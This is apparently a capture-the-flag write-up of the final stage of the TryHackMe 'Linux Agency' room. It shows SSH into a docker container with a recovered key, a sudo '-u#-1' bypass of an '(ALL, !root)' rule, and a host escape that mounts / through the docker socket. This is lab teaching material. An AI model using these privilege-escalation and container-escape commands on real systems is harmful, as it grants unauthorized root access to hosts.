THM: Linux Agency
Game Zone
This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride.
This is Linux Agency from THM. It doesn’t seem to have a rating? There are 31 flags which mostly involve basic concepts to grab, then you escalate through a bunch of users mostly with GTFOBins techniques. It’s only the last part I’m going to mention.
Final Steps
As maya, linpeas shows us this:
root 1395 0.0 0.3 404800 3432 ? Sl 01:41 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 2222 -container-ip 172.17.0.2 -container-port 22
We log in as robert using his SSH key and passphrase we found earlier:
maya@linuxagency:~/old_robert_ssh$ ssh -p 2222 -i id_rsa robert@localhost
robert@localhosts password:
Last login: Tue Jan 12 17:02:07 2021 from 172.17.0.1
robert@ec96850005d6:~$We’re in a docker container.
We can become root in the container:
robert@ec96850005d6:~$ sudo -l
Matching Defaults entries for robert on ec96850005d6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User robert may run the following commands on ec96850005d6:
(ALL, !root) NOPASSWD: /bin/bash
robert@ec96850005d6:~$ sudo -u#-1 /bin/bash
root@ec96850005d6:~#And then escape it:
root@ec96850005d6:/root# /tmp/docker -H unix:///run/docker.sock images -a
There is one called mangoman.
root@ec96850005d6:/root# /tmp/docker run -it -v /:/host mangoman chroot /host/ bash
root@7aebfd2b211c:/#Note: docker wasn’t in the path, it was in /tmp for some reason; probably to make it harder. Linpeas pointed out run/docker.sock.
root@7aebfd2b211c:~# cat message.txt
Nice Job 47
We are really impressed with your skills
Hope you enjoyed your journey!!
Your directors of ICA
0z09e & Xyan1d3
========>0z09e
https://github.com/0z09e
https://twitter.com/0z09e
========>Xyan1d3
https://twitter.com/xyan1d3
https://github.com/xyan1d3